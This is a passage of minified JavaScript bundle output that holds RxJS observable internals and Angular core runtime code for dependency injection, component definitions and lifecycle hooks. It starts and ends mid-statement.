R}next(e){S(()=>{if(this._throwIfClosed(),!this.isStopped){this.currentObservers||(this.currentObservers=Array.from(this.observers));for(const i of this.currentObservers)i.next(e)}})}error(e){S(()=>{if(this._throwIfClosed(),!this.isStopped){this.hasError=this.isStopped=!0,this.thrownError=e;const{observers:i}=this;for(;i.length;)i.shift().error(e)}})}complete(){S(()=>{if(this._throwIfClosed(),!this.isStopped){this.isStopped=!0;const{observers:e}=this;for(;e.length;)e.shift().complete()}})}unsubscribe(){this.isStopped=this.closed=!0,this.observers=this.currentObservers=null}get observed(){var e;return(null===(e=this.observers)||void 0===e?void 0:e.length)>0}_trySubscribe(e){return this._throwIfClosed(),super._trySubscribe(e)}_subscribe(e){return this._throwIfClosed(),this._checkFinalizedStatuses(e),this._innerSubscribe(e)}_innerSubscribe(e){const{hasError:i,isStopped:n,observers:r}=this;return i||n?Q:(this.currentObservers=null,r.push(e),new I(()=>{this.currentObservers=null,ae(r,e)}))}_checkFinalizedStatuses(e){const{hasError:i,thrownError:n,isStopped:r}=this;i?e.error(n):r&&e.complete()}asObservable(){const e=new G;return e.source=this,e}}return t.create=(a,e)=>new Z(a,e),t})();class Z extends J{constructor(a,e){super(),this.destination=a,this.source=e}next(a){var e,i;null===(i=null===(e=this.destination)||void 0===e?void 0:e.next)||void 0===i||i.call(e,a)}error(a){var e,i;null===(i=null===(e=this.destination)||void 0===e?void 0:e.error)||void 0===i||i.call(e,a)}complete(){var a,e;null===(e=null===(a=this.destination)||void 0===a?void 0:a.complete)||void 0===e||e.call(a)}_subscribe(a){var e,i;return null!==(i=null===(e=this.source)||void 0===e?void 0:e.subscribe(a))&&void 0!==i?i:Q}}function ue(t){return ie(null==t?void 0:t.lift)}function Ie(t){return a=>{if(ue(a))return a.lift(function(e){try{return t(e,this)}catch(i){this.error(i)}});throw new TypeError("Unable to lift unknown Observable type")}}function Ae(t,a,e,i,n){return new Ue(t,a,e,i,n)}class Ue extends U{constructor(a,e,i,n,r,c){super(a),this.onFinalize=r,this.shouldUnsubscribe=c,this._next=e?function(d){try{e(d)}catch(T){a.error(T)}}:super._next,this._error=n?function(d){try{n(d)}catch(T){a.error(T)}finally{this.unsubscribe()}}:super._error,this._complete=i?function(){try{i()}catch(d){a.error(d)}finally{this.unsubscribe()}}:super._complete}unsubscribe(){var a;if(!this.shouldUnsubscribe||this.shouldUnsubscribe()){const{closed:e}=this;super.unsubscribe(),!e&&(null===(a=this.onFinalize)||void 0===a||a.call(this))}}}function Xe(t,a){return Ie((e,i)=>{let n=0;e.subscribe(Ae(i,r=>{i.next(t.call(a,r,n++))}))})}function ht(t,a,e,i){return new(e||(e=Promise))(function(r,c){function d(q){try{k(i.next(q))}catch(Y){c(Y)}}function T(q){try{k(i.throw(q))}catch(Y){c(Y)}}function k(q){q.done?r(q.value):function n(r){return r instanceof e?r:new e(function(c){c(r)})}(q.value).then(d,T)}k((i=i.apply(t,a||[])).next())})}function Le(t){return this instanceof Le?(this.v=t,this):new Le(t)}function $e(t,a,e){if(!Symbol.asyncIterator)throw new TypeError("Symbol.asyncIterator is not defined.");var n,i=e.apply(t,a||[]),r=[];return n={},c("next"),c("throw"),c("return"),n[Symbol.asyncIterator]=function(){return this},n;function c(te){i[te]&&(n[te]=function(pe){return new Promise(function(Re,Fe){r.push([te,pe,Re,Fe])>1||d(te,pe)})})}function d(te,pe){try{!function T(te){te.value instanceof Le?Promise.resolve(te.value.v).then(k,q):Y(r[0][2],te)}(i[te](pe))}catch(Re){Y(r[0][3],Re)}}function k(te){d("next",te)}function q(te){d("throw",te)}function Y(te,pe){te(pe),r.shift(),r.length&&d(r[0][0],r[0][1])}}function xt(t){if(!Symbol.asyncIterator)throw new TypeError("Symbol.asyncIterator is not defined.");var e,a=t[Symbol.asyncIterator];return a?a.call(t):(t=function xe(t){var a="function"==typeof Symbol&&Symbol.iterator,e=a&&t[a],i=0;if(e)return e.call(t);if(t&&"number"==typeof t.length)return{next:function(){return t&&i>=t.length&&(t=void 0),{value:t&&t[i++],done:!t}}};throw new TypeError(a?"Object is not iterable.":"Symbol.iterator is not defined.")}(t),e={},i("next"),i("throw"),i("return"),e[Symbol.asyncIterator]=function(){return this},e);function i(r){e[r]=t[r]&&function(c){return new Promise(function(d,T){!function n(r,c,d,T){Promise.resolve(T).then(function(k){r({value:k,done:d})},c)}(d,T,(c=t[r](c)).done,c.value)})}}}const Gt=t=>t&&"number"==typeof t.length&&"function"!=typeof t;function Co(t){return ie(null==t?void 0:t.then)}function jt(t){return ie(t[f])}function qt(t){return Symbol.asyncIterator&&ie(null==t?void 0:t[Symbol.asyncIterator])}function Qn(t){return new TypeError(`You provided ${null!==t&&"object"==typeof t?"an invalid object":`'${t}'`} where a stream was expected. You can provide an Observable, Promise, ReadableStream, Array, AsyncIterable, or Iterable.`)}const Zt=function Kt(){return"function"==typeof Symbol&&Symbol.iterator?Symbol.iterator:"@@iterator"}();function Bo(t){return ie(null==t?void 0:t[Zt])}function ti(t){return $e(this,arguments,function*(){const e=t.getReader();try{for(;;){const{value:i,done:n}=yield Le(e.read());if(n)return yield Le(void 0);yield yield Le(i)}}finally{e.releaseLock()}})}function ii(t){return ie(null==t?void 0:t.getReader)}function pn(t){if(t instanceof G)return t;if(null!=t){if(jt(t))return function Pt(t){return new G(a=>{const e=t[f]();if(ie(e.subscribe))return e.subscribe(a);throw new TypeError("Provided object does not correctly implement Symbol.observable")})}(t);if(Gt(t))return function Xt(t){return new G(a=>{for(let e=0;e<t.length&&!a.closed;e++)a.next(t[e]);a.complete()})}(t);if(Co(t))return function Ho(t){return new G(a=>{t.then(e=>{a.closed||(a.next(e),a.complete())},e=>a.error(e)).then(null,_)})}(t);if(qt(t))return ei(t);if(Bo(t))return function Qt(t){return new G(a=>{for(const e of t)if(a.next(e),a.closed)return;a.complete()})}(t);if(ii(t))return function $o(t){return ei(ti(t))}(t)}throw Qn(t)}function ei(t){return new G(a=>{(function ai(t,a){var e,i,n,r;return ht(this,void 0,void 0,function*(){try{for(e=xt(t);!(i=yield e.next()).done;)if(a.next(i.value),a.closed)return}catch(c){n={error:c}}finally{try{i&&!i.done&&(r=e.return)&&(yield r.call(e))}finally{if(n)throw n.error}}a.complete()})})(t,a).catch(e=>a.error(e))})}function $t(t,a,e,i=0,n=!1){const r=a.schedule(function(){e(),n?t.add(this.schedule(null,i)):this.unsubscribe()},i);if(t.add(r),!n)return r}function Ut(t,a,e=1/0){return ie(a)?Ut((i,n)=>Xe((r,c)=>a(i,r,n,c))(pn(t(i,n))),e):("number"==typeof a&&(e=a),Ie((i,n)=>function zo(t,a,e,i,n,r,c,d){const T=[];let k=0,q=0,Y=!1;const te=()=>{Y&&!T.length&&!k&&a.complete()},pe=Fe=>k<i?Re(Fe):T.push(Fe),Re=Fe=>{r&&a.next(Fe),k++;let Ne=!1;pn(e(Fe,q++)).subscribe(Ae(a,et=>{null==n||n(et),r?pe(et):a.next(et)},()=>{Ne=!0},void 0,()=>{if(Ne)try{for(k--;T.length&&k<i;){const et=T.shift();c?$t(a,c,()=>Re(et)):Re(et)}te()}catch(et){a.error(et)}}))};return t.subscribe(Ae(a,pe,()=>{Y=!0,te()})),()=>{null==d||d()}}(i,n,t,e)))}function Yt(t=1/0){return Ut(A,t)}const ha=new G(t=>t.complete());function co(t){return t&&ie(t.schedule)}function io(t){return t[t.length-1]}function yo(t){return ie(io(t))?t.pop():void 0}function Vn(t){return co(io(t))?t.pop():void 0}function Pn(t,a=0){return Ie((e,i)=>{e.subscribe(Ae(i,n=>$t(i,t,()=>i.next(n),a),()=>$t(i,t,()=>i.complete(),a),n=>$t(i,t,()=>i.error(n),a)))})}function lo(t,a=0){return Ie((e,i)=>{i.add(t.schedule(()=>e.subscribe(i),a))})}function Mo(t,a){if(!t)throw new Error("Iterable cannot be null");return new G(e=>{$t(e,a,()=>{const i=t[Symbol.asyncIterator]();$t(e,a,()=>{i.next().then(n=>{n.done?e.complete():e.next(n.value)})},0,!0)})})}function Sa(t,a){return a?function Kn(t,a){if(null!=t){if(jt(t))return function ao(t,a){return pn(t).pipe(lo(a),Pn(a))}(t,a);if(Gt(t))return function $n(t,a){return new G(e=>{let i=0;return a.schedule(function(){i===t.length?e.complete():(e.next(t[i++]),e.closed||this.schedule())})})}(t,a);if(Co(t))return function bo(t,a){return pn(t).pipe(lo(a),Pn(a))}(t,a);if(qt(t))return Mo(t,a);if(Bo(t))return function Do(t,a){return new G(e=>{let i;return $t(e,a,()=>{i=t[Zt](),$t(e,a,()=>{let n,r;try{({value:n,done:r}=i.next())}catch(c){return void e.error(c)}r?e.complete():e.next(n)},0,!0)}),()=>ie(null==i?void 0:i.return)&&i.return()})}(t,a);if(ii(t))return function no(t,a){return Mo(ti(t),a)}(t,a)}throw Qn(t)}(t,a):pn(t)}function ra(...t){const a=Vn(t),e=function Eo(t,a){return"number"==typeof io(t)?t.pop():a}(t,1/0),i=t;return i.length?1===i.length?pn(i[0]):Yt(e)(Sa(i,a)):ha}function Bd(t={}){const{connector:a=(()=>new J),resetOnError:e=!0,resetOnComplete:i=!0,resetOnRefCountZero:n=!0}=t;return r=>{let c,d,T,k=0,q=!1,Y=!1;const te=()=>{null==d||d.unsubscribe(),d=void 0},pe=()=>{te(),c=T=void 0,q=Y=!1},Re=()=>{const Fe=c;pe(),null==Fe||Fe.unsubscribe()};return Ie((Fe,Ne)=>{k++,!Y&&!q&&te();const et=T=null!=T?T:a();Ne.add(()=>{k--,0===k&&!Y&&!q&&(d=cl(Re,n))}),et.subscribe(Ne),!c&&k>0&&(c=new ve({next:ut=>et.next(ut),error:ut=>{Y=!0,te(),d=cl(pe,e,ut),et.error(ut)},complete:()=>{q=!0,te(),d=cl(pe,i),et.complete()}}),pn(Fe).subscribe(c))})(r)}}function cl(t,a,...e){if(!0===a)return void t();if(!1===a)return;const i=new ve({next:()=>{i.unsubscribe(),t()}});return a(...e).subscribe(i)}function Bn(t){for(let a in t)if(t[a]===Bn)return a;throw Error("Could not find renamed property on target object.")}function Hd(t,a){for(const e in a)a.hasOwnProperty(e)&&!t.hasOwnProperty(e)&&(t[e]=a[e])}function Wo(t){if("string"==typeof t)return t;if(Array.isArray(t))return"["+t.map(Wo).join(", ")+"]";if(null==t)return""+t;if(t.overriddenName)return`${t.overriddenName}`;if(t.name)return`${t.name}`;const a=t.toString();if(null==a)return""+a;const e=a.indexOf("\n");return-1===e?a:a.substring(0,e)}function ss(t,a){return null==t||""===t?null===a?"":a:null==a||""===a?t:t+" "+a}const w2=Bn({__forward_ref__:Bn});function ja(t){return t.__forward_ref__=ja,t.toString=function(){return Wo(this())},t}function La(t){return Kp(t)?t():t}function Kp(t){return"function"==typeof t&&t.hasOwnProperty(w2)&&t.__forward_ref__===ja}class gi extends Error{constructor(a,e){super(function bf(t,a){return`NG0${Math.abs(t)}${a?": "+a.trim():""}`}(a,e)),this.code=a}}function Qa(t){return"string"==typeof t?t:null==t?"":String(t)}function Vu(t,a){throw new gi(-201,!1)}function mr(t,a){null==t&&function mo(t,a,e,i){throw new Error(`ASSERTION ERROR: ${t}`+(null==i?"":` [Expected=> ${e} ${i} ${a} <=Actual]`))}(a,t,null,"!=")}function hi(t){return{token:t.token,providedIn:t.providedIn||null,factory:t.factory,value:void 0}}function Ci(t){return{providers:t.providers||[],imports:t.imports||[]}}function Hu(t){return a0(t,Ll)||a0(t,Mf)}function a0(t,a){return t.hasOwnProperty(a)?t[a]:null}function Xp(t){return t&&(t.hasOwnProperty(Yp)||t.hasOwnProperty(F2))?t[Yp]:null}const Ll=Bn({\u0275prov:Bn}),Yp=Bn({\u0275inj:Bn}),Mf=Bn({ngInjectableDef:Bn}),F2=Bn({ngInjectorDef:Bn});var Da=(()=>((Da=Da||{})[Da.Default=0]="Default",Da[Da.Host=1]="Host",Da[Da.Self=2]="Self",Da[Da.SkipSelf=4]="SkipSelf",Da[Da.Optional=8]="Optional",Da))();let Vm;function Bs(t){const a=Vm;return Vm=t,a}function Jp(t,a,e){const i=Hu(t);return i&&"root"==i.providedIn?void 0===i.value?i.value=i.factory():i.value:e&Da.Optional?null:void 0!==a?a:void Vu(Wo(t))}function Pc(t){return{toString:t}.toString()}var ec=(()=>((ec=ec||{})[ec.OnPush=0]="OnPush",ec[ec.Default=1]="Default",ec))(),dc=(()=>{return(t=dc||(dc={}))[t.Emulated=0]="Emulated",t[t.None=2]="None",t[t.ShadowDom=3]="ShadowDom",dc;var t})();const vo=(()=>"undefined"!=typeof globalThis&&globalThis||"undefined"!=typeof global&&global||"undefined"!=typeof window&&window||"undefined"!=typeof self&&"undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope&&self)(),Ud={},Xn=[],Af=Bn({\u0275cmp:Bn}),e_=Bn({\u0275dir:Bn}),t_=Bn({\u0275pipe:Bn}),n0=Bn({\u0275mod:Bn}),mc=Bn({\u0275fac:Bn}),qd=Bn({__NG_ELEMENT_ID__:Bn});let H2=0;function Wt(t){return Pc(()=>{const e=!0===t.standalone,i={},n={type:t.type,providersResolver:null,decls:t.decls,vars:t.vars,factory:null,template:t.template||null,consts:t.consts||null,ngContentSelectors:t.ngContentSelectors,hostBindings:t.hostBindings||null,hostVars:t.hostVars||0,hostAttrs:t.hostAttrs||null,contentQueries:t.contentQueries||null,declaredInputs:i,inputs:null,outputs:null,exportAs:t.exportAs||null,onPush:t.changeDetection===ec.OnPush,directiveDefs:null,pipeDefs:null,standalone:e,dependencies:e&&t.dependencies||null,getStandaloneInjector:null,selectors:t.selectors||Xn,viewQuery:t.viewQuery||null,features:t.features||null,data:t.data||{},encapsulation:t.encapsulation||dc.Emulated,id:"c"+H2++,styles:t.styles||Xn,_:null,setInput:null,schemas:t.schemas||null,tView:null},r=t.dependencies,c=t.features;return n.inputs=Uu(t.inputs,i),n.outputs=Uu(t.outputs),c&&c.forEach(d=>d(n)),n.directiveDefs=r?()=>("function"==typeof r?r():r).map(o0).filter(i_):null,n.pipeDefs=r?()=>("function"==typeof r?r():r).map(tn).filter(i_):null,n})}function Ds(t,a,e){const i=t.\u0275cmp;i.directiveDefs=()=>("function"==typeof a?a():a).map(o0),i.pipeDefs=()=>("function"==typeof e?e():e).map(tn)}function o0(t){return Un(t)||ur(t)}function i_(t){return null!==t}function yi(t){return Pc(()=>({type:t.type,bootstrap:t.bootstrap||Xn,declarations:t.declarations||Xn,imports:t.imports||Xn,exports:t.exports||Xn,transitiveCompileScopes:null,schemas:t.schemas||null,id:t.id||null}))}function Uu(t,a){if(null==t)return Ud;const e={};for(const i in t)if(t.hasOwnProperty(i)){let n=t[i],r=n;Array.isArray(n)&&(r=n[1],n=n[0]),e[n]=i,a&&(a[n]=r)}return e}const Ot=Wt;function Fr(t){return{type:t.type,name:t.name,factory:null,pure:!1!==t.pure,standalone:!0===t.standalone,onDestroy:t.type.prototype.ngOnDestroy||null}}function Un(t){return t[Af]||null}function ur(t){return t[e_]||null}function tn(t){return t[t_]||null}function ds(t,a){const e=t[n0]||null;if(!e&&!0===a)throw new Error(`Type ${Wo(t)} does not have '\u0275mod' property.`);return e}function us(t){return Array.isArray(t)&&"object"==typeof t[1]}function Is(t){return Array.isArray(t)&&!0===t[1]}function Gu(t){return 0!=(8&t.flags)}function dl(t){return 2==(2&t.flags)}function uc(t){return 1==(1&t.flags)}function gr(t){return null!==t.template}function s0(t){return 0!=(256&t[2])}function Qd(t,a){return t.hasOwnProperty(mc)?t[mc]:null}class u0{constructor(a,e,i){this.previousValue=a,this.currentValue=e,this.firstChange=i}isFirstChange(){return this.firstChange}}function sa(){return h0}function h0(t){return t.type.prototype.ngOnChanges&&(t.setInput=wf),f0}function f0(){const t=r_(this),a=null==t?void 0:t.current;if(a){const e=t.previous;if(e===Ud)t.previous=a;else for(let i in a)e[i]=a[i];t.current=null,this.ngOnChanges(a)}}function wf(t,a,e,i){const n=r_(t)||function X2(t,a){return t[p0]=a}(t,{previous:Ud,current:null}),r=n.current||(n.current={}),c=n.previous,d=this.declaredInputs[e],T=c[d];r[d]=new u0(T&&T.currentValue,a,c===Ud),t[i]=a}sa.ngInherit=!0;const p0="__ngSimpleChanges__";function r_(t){return t[p0]||null}function Ar(t){for(;Array.isArray(t);)t=t[0];return t}function $d(t,a){return Ar(a[t])}function pc(t,a){return Ar(a[t.index])}function d_(t,a){return t.data[a]}function Lc(t,a){return t[a]}function hs(t,a){const e=a[t];return us(e)?e:e[0]}function Um(t){return 64==(64&t[2])}function Rs(t,a){return null==a?null:t[a]}function m_(t){t[18]=0}function sd(t,a){t[5]+=a;let e=t,i=t[3];for(;null!==i&&(1===a&&1===e[5]||-1===a&&0===e[5]);)i[5]+=a,e=i,i=i[3]}const Ua={lFrame:v0(null),bindingsEnabled:!0};function Ku(){return Ua.bindingsEnabled}function bi(){return Ua.lFrame.lView}function Rn(){return Ua.lFrame.tView}function be(t){return Ua.lFrame.contextLView=t,t[8]}function Me(t){return Ua.lFrame.contextLView=null,t}function or(){let t=kf();for(;null!==t&&64===t.type;)t=t.parent;return t}function kf(){return Ua.lFrame.currentTNode}function _c(t,a){const e=Ua.lFrame;e.currentTNode=t,e.isParent=a}function Xu(){return Ua.lFrame.isParent}function Yu(){Ua.lFrame.isParent=!1}function fs(){const t=Ua.lFrame;let a=t.bindingRootIndex;return-1===a&&(a=t.bindingRootIndex=t.tView.bindingStartIndex),a}function ml(){return Ua.lFrame.bindingIndex}function cd(){return Ua.lFrame.bindingIndex++}function ul(t){const a=Ua.lFrame,e=a.bindingIndex;return a.bindingIndex=a.bindingIndex+t,e}function Gm(t,a){const e=Ua.lFrame;e.bindingIndex=e.bindingRootIndex=t,__(a)}function __(t){Ua.lFrame.currentDirectiveIndex=t}function Pf(t){const a=Ua.lFrame.currentDirectiveIndex;return-1===a?null:t[a]}function ld(){return Ua.lFrame.currentQueryIndex}function g_(t){Ua.lFrame.currentQueryIndex=t}function zc(t){const a=t[1];return 2===a.type?a.declTNode:1===a.type?t[6]:null}function M0(t,a,e){if(e&Da.SkipSelf){let n=a,r=t;for(;!(n=n.parent,null!==n||e&Da.Host||(n=zc(r),null===n||(r=r[15],10&n.type))););if(null===n)return!1;a=n,t=r}const i=Ua.lFrame=y_();return i.currentTNode=a,i.lView=t,!0}function C_(t){const a=y_(),e=t[1];Ua.lFrame=a,a.currentTNode=e.firstChild,a.lView=t,a.tView=e,a.contextLView=t,a.bindingIndex=e.bindingStartIndex,a.inI18n=!1}function y_(){const t=Ua.lFrame,a=null===t?null:t.child;return null===a?v0(t):a}function v0(t){const a={currentTNode:null,isParent:!0,lView:null,tView:null,selectedIndex:-1,contextLView:null,elementDepthCount:0,currentNamespace:null,currentDirectiveIndex:-1,bindingRootIndex:-1,bindingIndex:-1,currentQueryIndex:0,parent:t,child:null,inI18n:!1};return null!==t&&(t.child=a),a}function A0(){const t=Ua.lFrame;return Ua.lFrame=t.parent,t.currentTNode=null,t.lView=null,t}const Tr=A0;function b_(){const t=A0();t.isParent=!0,t.tView=null,t.selectedIndex=-1,t.contextLView=null,t.elementDepthCount=0,t.currentDirectiveIndex=-1,t.currentNamespace=null,t.bindingRootIndex=-1,t.bindingIndex=-1,t.currentQueryIndex=0}function Ss(){return Ua.lFrame.selectedIndex}function hl(t){Ua.lFrame.selectedIndex=t}function rr(){const t=Ua.lFrame;return d_(t.tView,t.selectedIndex)}function fi(){Ua.lFrame.currentNamespace="svg"}function ln(){!function cC(){Ua.lFrame.currentNamespace=null}()}function Ju(t,a){for(let e=a.directiveStart,i=a.directiveEnd;e<i;e++){const r=t.data[e].type.prototype,{ngAfterContentInit:c,ngAfterContentChecked:d,ngAfterViewInit:T,ngAfterViewChecked:k,ngOnDestroy:q}=r;c&&(t.contentHooks||(t.contentHooks=[])).push(-e,c),d&&((t.contentHooks||(t.contentHooks=[])).push(e,d),(t.contentCheckHooks||(t.contentCheckHooks=[])).push(e,d)),T&&(t.viewHooks||(t.viewHooks=[])).push(-e,T),k&&((t.viewHooks||(t.viewHooks=[])).push(e,k),(t.viewCheckHooks||(t.viewCheckHooks=[])).push(e,k)),null!=q&&(t.destroyHooks||(t.destroyHooks=[])).push(e,q)}}function ji(t,a,e){Of(t,a,3,e)}function Zu(t,a,e,i){(3&t[2])===e&&Of(t,a,e,i)}function M_(t,a){let e=t[2];(3&e)===a&&(e&=2047,e+=1,t[2]=e)}function Of(t,a,e,i){const r=null!=i?i:-1,c=a.length-1;let d=0;for(let T=void 0!==i?65535&t[18]:0;T<c;T++)if("number"==typeof a[T+1]){if(d=a[T],null!=i&&d>=i)break}else a[T]<0&&(t[18]+=65536),(d<r||-1==r)&&(fl(t,e,a,T),t[18]=(4294901760&t[18])+T+2),T++}function fl(t,a,e,i){const n=e[i]<0,r=e[i+1],d=t[n?-e[i]:e[i]];if(n){if(t[2]>>11<t[18]>>16&&(3&t[2])===a){t[2]+=2048;try{r.call(d)}finally{}}}else try{r.call(d)}finally{}}class dd{constructor(a,e,i){this.factory=a,this.resolving=!1,this.canSeeViewProviders=e,this.injectImpl=i}}function Nf(t,a,e){let i=0;for(;i<e.length;){const n=e[i];if("number"==typeof n){if(0!==n)break;i++;const r=e[i++],c=e[i++],d=e[i++];t.setAttribute(a,c,d,r)}else{const r=n,c=e[++i];A_(r)?t.setProperty(a,r,c):t.setAttribute(a,r,c),i++}}return i}function th(t){return 3===t||4===t||6===t}function A_(t){return 64===t.charCodeAt(0)}function jm(t,a){if(null!==a&&0!==a.length)if(null===t||0===t.length)t=a.slice();else{let e=-1;for(let i=0;i<a.length;i++){const n=a[i];"number"==typeof n?e=n:0===e||D0(t,e,n,null,-1===e||2===e?a[++i]:null)}}return t}function D0(t,a,e,i,n){let r=0,c=t.length;if(-1===a)c=-1;else for(;r<t.length;){const d=t[r++];if("number"==typeof d){if(d===a){c=-1;break}if(d>a){c=r-1;break}}}for(;r<t.length;){const d=t[r];if("number"==typeof d)break;if(d===e){if(null===i)return void(null!==n&&(t[r+1]=n));if(i===t[r+1])return void(t[r+2]=n)}r++,null!==i&&r++,null!==n&&r++}-1!==c&&(t.splice(c,0,a),r=c+1),t.splice(r++,0,e),null!==i&&t.splice(r++,0,i),null!==n&&t.splice(r++,0,n)}function x0(t){return-1!==t}function md(t){return 32767&t}function Qm(t,a){let e=function uC(t){return t>>16}(t),i=a;for(;e>0;)i=i[15],e--;return i}let ih=!0;function Lf(t){const a=ih;return ih=t,a}let I0=0;const _l={};function ah(t,a){const e=E_(t,a);if(-1!==e)return e;const i=a[1];i.firstCreatePass&&(t.injectorIndex=a.length,$m(i.data,t),$m(a,null),$m(i.blueprint,null));const n=Jd(t,a),r=t.injectorIndex;if(x0(n)){const c=md(n),d=Qm(n,a),T=d[1].data;for(let k=0;k<8;k++)a[r+k]=d[c+k]|T[c+k]}return a[r+8]=n,r}function $m(t,a){t.push(0,0,0,0,0,0,0,0,a)}function E_(t,a){return-1===t.injectorIndex||t.parent&&t.parent.injectorIndex===t.injectorIndex||null===a[t.injectorIndex+8]?-1:t.injectorIndex}function Jd(t,a){if(t.parent&&-1!==t.parent.injectorIndex)return t.parent.injectorIndex;let e=0,i=null,n=a;for(;null!==n;){if(i=P0(n),null===i)return-1;if(e++,n=n[15],-1!==i.injectorIndex)return i.injectorIndex|e<<16}return-1}function Km(t,a,e){!function R0(t,a,e){let i;"string"==typeof e?i=e.charCodeAt(0)||0:e.hasOwnProperty(qd)&&(i=e[qd]),null==i&&(i=e[qd]=I0++);const n=255&i;a.data[t+(n>>5)]|=1<<n}(t,a,e)}function D_(t,a,e){if(e&Da.Optional||void 0!==t)return t;Vu()}function x_(t,a,e,i){if(e&Da.Optional&&void 0===i&&(i=null),0==(e&(Da.Self|Da.Host))){const n=t[9],r=Bs(void 0);try{return n?n.get(a,i,e&Da.Optional):Jp(a,i,e&Da.Optional)}finally{Bs(r)}}return D_(i,0,e)}function Zd(t,a,e,i=Da.Default,n){if(null!==t){if(1024&a[2]){const c=function I_(t,a,e,i,n){let r=t,c=a;for(;null!==r&&null!==c&&1024&c[2]&&!(256&c[2]);){const d=ud(r,c,e,i|Da.Self,_l);if(d!==_l)return d;let T=r.parent;if(!T){const k=c[21];if(k){const q=k.get(e,_l,i);if(q!==_l)return q}T=P0(c),c=c[15]}r=T}return n}(t,a,e,i,_l);if(c!==_l)return c}const r=ud(t,a,e,i,_l);if(r!==_l)return r}return x_(a,e,i,n)}function ud(t,a,e,i,n){const r=function k0(t){if("string"==typeof t)return t.charCodeAt(0)||0;const a=t.hasOwnProperty(qd)?t[qd]:void 0;return"number"==typeof a?a>=0?255&a:fC:a}(e);if("function"==typeof r){if(!M0(a,t,i))return i&Da.Host?D_(n,0,i):x_(a,e,i,n);try{const c=r(i);if(null!=c||i&Da.Optional)return c;Vu()}finally{Tr()}}else if("number"==typeof r){let c=null,d=E_(t,a),T=-1,k=i&Da.Host?a[16][6]:null;for((-1===d||i&Da.SkipSelf)&&(T=-1===d?Jd(t,a):a[d+8],-1!==T&&zf(i,!1)?(c=a[1],d=md(T),a=Qm(T,a)):d=-1);-1!==d;){const q=a[1];if(w_(r,d,q.data)){const Y=gl(d,a,e,c,i,k);if(Y!==_l)return Y}T=a[d+8],-1!==T&&zf(i,a[1].data[d+8]===k)&&w_(r,d,a)?(c=q,d=md(T),a=Qm(T,a)):d=-1}}return n}function gl(t,a,e,i,n,r){const c=a[1],d=c.data[t+8],q=nh(d,c,e,null==i?dl(d)&&ih:i!=c&&0!=(3&d.type),n&Da.Host&&r===d);return null!==q?Xm(a,c,q,d):_l}function nh(t,a,e,i,n){const r=t.providerIndexes,c=a.data,d=1048575&r,T=t.directiveStart,q=r>>20,te=n?d+q:t.directiveEnd;for(let pe=i?d:d+q;pe<te;pe++){const Re=c[pe];if(pe<T&&e===Re||pe>=T&&Re.type===e)return pe}if(n){const pe=c[T];if(pe&&gr(pe)&&pe.type===e)return T}return null}function Xm(t,a,e,i){let n=t[e];const r=a.data;if(function eh(t){return t instanceof dd}(n)){const c=n;c.resolving&&function I2(t,a){const e=a?`. Dependency path: ${a.join(" > ")} > ${t}`:"";throw new gi(-200,`Circular dependency in DI detected for ${t}${e}`)}(function Hn(t){return"function"==typeof t?t.name||t.toString():"object"==typeof t&&null!=t&&"function"==typeof t.type?t.type.name||t.type.toString():Qa(t)}(r[e]));const d=Lf(c.canSeeViewProviders);c.resolving=!0;const T=c.injectImpl?Bs(c.injectImpl):null;M0(t,i,Da.Default);try{n=t[e]=c.factory(void 0,r,t,i),a.firstCreatePass&&e>=i.directiveStart&&function dC(t,a,e){const{ngOnChanges:i,ngOnInit:n,ngDoCheck:r}=a.type.prototype;if(i){const c=h0(a);(e.preOrderHooks||(e.preOrderHooks=[])).push(t,c),(e.preOrderCheckHooks||(e.preOrderCheckHooks=[])).push(t,c)}n&&(e.preOrderHooks||(e.preOrderHooks=[])).push(0-t,n),r&&((e.preOrderHooks||(e.preOrderHooks=[])).push(t,r),(e.preOrderCheckHooks||(e.preOrderCheckHooks=[])).push(t,r))}(e,r[e],a)}finally{null!==T&&Bs(T),Lf(d),c.resolving=!1,Tr()}}return n}function w_(t,a,e){return!!(e[a+(t>>5)]&1<<t)}function zf(t,a){return!(t&Da.Self||t&Da.Host&&a)}class Ym{constructor(a,e){this._tNode=a,this._lView=e}get(a,e,i){return Zd(this._tNode,this._lView,a,i,e)}}function fC(){return new Ym(or(),bi())}function ba(t){return Pc(()=>{const a=t.prototype.constructor,e=a[mc]||Us(a),i=Object.prototype;let n=Object.getPrototypeOf(t.prototype).constructor;for(;n&&n!==i;){const r=n[mc]||Us(n);if(r&&r!==e)return r;n=Object.getPrototypeOf(n)}return r=>new r})}function Us(t){return Kp(t)?()=>{const a=Us(La(t));return a&&a()}:Qd(t)}function P0(t){const a=t[1],e=a.type;return 2===e?a.declTNode:1===e?t[6]:null}function Vr(t){return function S0(t,a){if("class"===a)return t.classes;if("style"===a)return t.styles;const e=t.attrs;if(e){const i=e.length;let n=0;for(;n<i;){const r=e[n];if(th(r))break;if(0===r)n+=2;else if("number"==typeof r)for(n++;n<i&&"string"==typeof e[n];)n++;else{if(r===a)return e[n+1];n+=2}}}return null}(or(),t)}const Hl="__parameters__";function tm(t,a,e){return Pc(()=>{const i=function Wf(t){return function(...e){if(t){const i=t(...e);for(const n in i)this[n]=i[n]}}}(a);function n(...r){if(this instanceof n)return i.apply(this,r),this;const c=new n(...r);return d.annotation=c,d;function d(T,k,q){const Y=T.hasOwnProperty(Hl)?T[Hl]:Object.defineProperty(T,Hl,{value:[]})[Hl];for(;Y.length<=q;)Y.push(null);return(Y[q]=Y[q]||[]).push(c),T}}return e&&(n.prototype=Object.create(e.prototype)),n.prototype.ngMetadataName=t,n.annotationCls=n,n})}class ni{constructor(a,e){this._desc=a,this.ngMetadataName="InjectionToken",this.\u0275prov=void 0,"number"==typeof e?this.__NG_ELEMENT_ID__=e:void 0!==e&&(this.\u0275prov=hi({token:this,providedIn:e.providedIn||"root",factory:e.factory}))}get multi(){return this}toString(){return`InjectionToken ${this._desc}`}}function ac(t,a){void 0===a&&(a=t);for(let e=0;e<t.length;e++){let i=t[e];Array.isArray(i)?(a===t&&(a=t.slice(0,e)),ac(i,a)):a!==t&&a.push(i)}return a}function Wc(t,a){t.forEach(e=>Array.isArray(e)?Wc(e,a):a(e))}function P_(t,a,e){a>=t.length?t.push(e):t.splice(a,0,e)}function rh(t,a){return a>=t.length-1?t.pop():t.splice(a,1)[0]}function hd(t,a){const e=[];for(let i=0;i<t;i++)e.push(a);return e}function _s(t,a,e){let i=Cl(t,a);return i>=0?t[1|i]=e:(i=~i,function N_(t,a,e,i){let n=t.length;if(n==a)t.push(e,i);else 